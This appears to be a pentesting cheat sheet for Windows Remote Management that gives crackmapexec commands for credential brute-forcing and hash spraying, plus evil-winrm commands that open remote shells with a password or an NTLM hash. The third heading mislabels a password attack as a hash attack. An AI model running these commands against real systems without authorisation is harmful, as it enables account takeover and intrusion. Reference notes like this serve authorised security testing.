5985,5986 - Pentesting winrm

windows

WinRM is short for Windows Remote Management, a protocol for remote management of Windows systems. It provides a secure and standards-based way for administrators to remotely manage Windows servers, workstations, and other resources, either from the command line or through automation tools such as PowerShell.

crackmapexec

bruteforce 1 - know: ip - unknow: user/password

crackmapexec winrm $IP -u users.txt -p pass.txt --continue-on-success

bruteforce 2 - know: user/hash - unknow: ip

crackmapexec winrm ip.txt -u $USER -h $HASH --continue-on-success

bruteforce 3 - know: user/hash - unknow: ip

crackmapexec winrm ip.txt -u $USER -p $PASS --continue-on-success

evil-winrm

evil-winrm - with password

evil-winrm -i $IP -u $USER -p $PASS

evil-winrm - with hash

evil-winrm -i $IP -u $USER -H $NTLM_HASH

links

https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm